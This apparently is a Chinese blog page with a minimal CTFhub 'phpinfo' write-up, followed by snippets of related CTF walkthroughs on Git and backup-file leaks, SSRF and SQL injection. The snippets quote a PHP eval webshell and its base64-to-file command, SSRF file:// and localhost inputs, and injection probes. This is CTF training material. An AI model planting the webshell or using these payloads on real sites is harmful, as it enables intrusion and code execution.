CTFhub-phpinfo

2024-01-15 08:36
文章标签 ctfhub phpinfo

本文主要是介绍CTFhub-phpinfo,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

CTFhub-Web-信息泄露-“phpinfo”

题目信息

在这里插入图片描述

解题过程

ctrl+F搜索关键字…
在这里插入图片描述

这篇关于CTFhub-phpinfo的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/608279

相关文章

CTFHub技能树-Git泄漏-Index

目录 一、Git索引(Index)的基本概念 二、解题过程 主旨:使用git泄漏恢复源代码 方法一:使用GitHack手动恢复 方法二:直接使用Git_Extract获取网站源代码拿去flag   当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。请尝试使用BugScanTeam的Gi

CTFHub技能树-备份文件下载-bak文件

当开发人员在线上环境中对源代码进行了备份操作,并且将备份文件放在了 web 目录下,就会引起网站源码泄露。 使用dirsearch扫描出index.php.bak 有些时候网站管理员可能为了方便,会在修改某个文件的时候先复制一份,将其命名为xxx.bak。而大部分Web Server对bak文件并不做任何处理,导致可以直接下载,从而获取到网站某个文件的源代码.访问index.php.

CTFHub技能树-备份文件下载-网站源码

目录 法一:使用自动化工具扫描 方法二:使用dirsearch目录扫描器扫描   法一:使用自动化工具扫描 import requestsurl1 = 'http://challenge-0e8fe706d11de65e.sandbox.ctfhub.com:10800/' # url为被扫描地址,后不加‘/’# 常见的网站源码备份文件名list1 = ['web', '

ctfhub-web-SSRF(FastCGI协议-DNS重绑定 Bypass)

less-6  FastCGI协议 步骤一:开启环境,查看提示 步骤二:对一句话木马进行base64编码:<?php @eval($_POST[cmd]);?> echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > 1.php 步骤三:利用kali,使用Gopherus工具生成payload: python2 '/ho

CTFhub通关攻略-SRRF篇【6-11关】

06 FastCGI协议 漏洞原理 https://blog.csdn.net/mysteryflower/article/details/94386461 该关需要将一句话木马写入题目网站下,一句话木马要进行base64编码确实用双引号才可以。 一句话木马 <?php @eval($_POST[cmd]);?> base64编码 PD9waHAgQGV2YWwoJF9QT1NU

CTFhub通关攻略-SSRF篇【1-5关】

01关 内网访问 根据题意,它让我们去尝试访问127.0.0.1的flag.php,我们点进题目链接 有一个url参数可以进行输入,我们直接访问127.0.0.1的flag.php 这样就得到了flag 02 伪协议读取文件 点开题目链接发现有一个url的参数可以进行填写 题中说让我们尝试读取一下Web中的flag.php文件,所以直接访问 Web目录根据Li

ctfhub-web-SSRF(内网访问-上传文件)

www.ctfhub.com less-1  内网访问 步骤一:开启环境,查看提示 步骤二:输入url=http://127.0.0.1/flag.php 得出结果 显示提交成功 less-2  伪协议读取文件 步骤一:开启环境,查看提示 步骤二:输入url=file:///var/www/html/flag.php 出现三个问号,查看源代码 得

ctfhub-web-SSRF通关攻略

一、内网访问 1.打开ctfhub给的环境地址 2.观察题目 发现让我们访问127.0.0.1下的flag.php 在地址栏后面有一个url参数  ?url=http://127.0.0.1/flag.php  提交即可 二、伪协议读取文件 1.打开ctfhub给的环境 2.观察题目 发现让我们读取flag.php文件 读取文件用到的协议是file:// web默认目

ctfhub-web-整数型SQL注入

语句初识解释     ?id=1 and 1=1 ?id=1 and 1=2 ‘?’是传值的意思,如果后台没有过滤,and 1=1就会被带入后台SQL语句当中去进行查询,‘and’是并列与关系,必须左右两边都为真才能有返回值,如果出现 ?id=1 and 1=2这种错误的语法就会报错,可以用这种方式来判断SQL注入类型     --+ ’--‘在SQL语句中起着注释的作用,能将

Windows下PHP配置成功后phpinfo中找不到mysql

Windows下PHP配置成功后phpinfo中找不到mysql 问题描述 本地配置php开发环境(Apache + PHP + MySQL)后,测试时 phpinfo中找不到mysql 且此时PHP的测试程序怎么也连不上数据库,并报Call to undefined function mysql_connect() 的错误。 问题解决 检测配置文件 Apache Apache的